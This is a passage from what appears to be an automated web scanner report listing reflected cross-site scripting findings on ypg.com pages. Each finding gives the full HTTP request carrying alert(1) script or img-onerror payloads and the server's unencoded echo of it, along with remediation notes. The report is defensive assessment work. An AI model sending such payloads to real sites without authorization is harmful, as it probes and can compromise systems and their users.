Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:29:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (enb7f66--><img src=a onerror=alert(1)>ad5f6912306)
        </p>
...[SNIP]...

4.169. http://www.ypg.com/en/contact-us [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 6b7ce--><script>alert(1)</script>d71bb51e7af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/contact-us6b7ce--><script>alert(1)</script>d71bb51e7af HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:30:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(6) {
["lang"]=>
string(2) "en"
["url"]=>
string(55) "/contact-us6b7ce--><script>alert(1)</script>d71bb51e7af"
[3]=>
...[SNIP]...

4.170. http://www.ypg.com/en/contact-us [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cdfd1'><script>alert(1)</script>22ec70f7aad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact-us?cdfd1'><script>alert(1)</script>22ec70f7aad=1 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:28:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Yellow Pages Gro
...[SNIP]...
<a target="_blank" href='/en/contact-us?cdfd1'><script>alert(1)</script>22ec70f7aad=1?print=1'>
...[SNIP]...

4.171. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 8bd59--><img%20src%3da%20onerror%3dalert(1)>f48834a7354 was submitted in the REST URL parameter 1. This input was echoed as 8bd59--><img src=a onerror=alert(1)>f48834a7354 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en8bd59--><img%20src%3da%20onerror%3dalert(1)>f48834a7354/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:30:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (en8bd59--><img src=a onerror=alert(1)>f48834a7354)
        </p>
...[SNIP]...

4.172. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload c52da><script>alert(1)</script>1d3ad9b9a08 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact-us%27%22--%3E%3Cc52da><script>alert(1)</script>1d3ad9b9a08/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:30:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<c52da><script>alert(1)</script>1d3ad9b9a08/style>
...[SNIP]...

4.173. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the name of an HTML tag. The payload c7754><script>alert(1)</script>db21f56eda7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3Cc7754><script>alert(1)</script>db21f56eda7/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:30:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<c7754><script>alert(1)</script>db21f56eda7/script>
...[SNIP]...

4.174. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the name of an HTML tag. The payload 754e1><script>alert(1)</script>4412e20be66 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3C/754e1><script>alert(1)</script>4412e20be66/script%3E HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:31:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</754e1><script>alert(1)</script>4412e20be66/script>
...[SNIP]...

4.175. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b17ae%3balert(1)//42d657bd22f was submitted in the REST URL parameter 4. This input was echoed as b17ae;alert(1)//42d657bd22f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3Cb17ae%3balert(1)//42d657bd22f/script%3E HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:31:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<b17ae;alert(1)//42d657bd22f/script>
...[SNIP]...

4.176. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ea846%3balert(1)//f47b0af8e66 was submitted in the REST URL parameter 5. This input was echoed as ea846;alert(1)//f47b0af8e66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/ea846%3balert(1)//f47b0af8e66 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:31:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</ea846;alert(1)//f47b0af8e66"
[3]=>
...[SNIP]...

4.177. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7a283<script>alert(1)</script>472a5342049 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E7a283<script>alert(1)</script>472a5342049 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:31:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</script>7a283<script>alert(1)</script>472a5342049"
[3]=>
...[SNIP]...

4.178. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d9793<script>alert(1)</script>c26675cd183 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E?d9793<script>alert(1)</script>c26675cd183=1 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:30:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</script>"
["controller"]=>
string(5) "index"
["action"]=>
string(5) "index"
["module"]=>
string(9) "pagefront"
["d9793<script>alert(1)</script>c26675cd183"]=>
...[SNIP]...

4.179. http://www.ypg.com/en/images/loading.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/images/loading.gif

Issue detail

The value of REST URL parameter 1 is copied into the application's response. The payload 96651--><img%20src%3da%20onerror%3dalert(1)>14a5bb298df was submitted in the REST URL parameter 1 and was echoed, URL-decoded, as 96651--><img src=a onerror=alert(1)>14a5bb298df. The scanner labels the reflection point an HTML comment, but the excerpt below shows it in the visible text of the HTTP 404 error page, inside the dispatcher's "Invalid controller specified (...)" message that follows <b>Message:</b>, so the leading --> is not needed for the injected <img> element to be parsed there.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response; the PoC uses an onerror event handler rather than a <script> element to execute it.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. The underlying problem in this group of ypg.com issues is an error page that renders the exception message and a dump of the request parameters without HTML encoding. The "controller", "action" and "module" keys and the "Invalid controller specified" wording match the default error view of Zend Framework 1 with exception display enabled; that is an inference from the visible output, as the report does not name the framework. Production deployments should not display exception details or request dumps at all, and any error page that does must HTML-encode every value it prints, including URL path segments and parameter names.

Request

GET /en96651--><img%20src%3da%20onerror%3dalert(1)>14a5bb298df/images/loading.gif HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:27:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (en96651--><img src=a onerror=alert(1)>14a5bb298df)
        </p>
...[SNIP]...

4.180. http://www.ypg.com/en/images/loading.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/images/loading.gif

Issue detail

The value of REST URL parameter 2 is copied into the application's response. The payload ceec2--><script>alert(1)</script>f06c185198a was submitted in the REST URL parameter 2 and was echoed unmodified. Although the scanner reports an HTML comment context, the excerpt below shows the value in the "url" entry of the <pre> request-parameter dump on the HTTP 500 error page, which is plain text between tags; a bare <script> element is parsed there without closing anything first.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/imagesceec2--><script>alert(1)</script>f06c185198a/loading.gif HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:28:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(6) {
["lang"]=>
string(2) "en"
["url"]=>
string(63) "/imagesceec2--><script>alert(1)</script>f06c185198a/loading.gif"
[3]=>
...[SNIP]...

4.181. http://www.ypg.com/en/images/loading.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/images/loading.gif

Issue detail

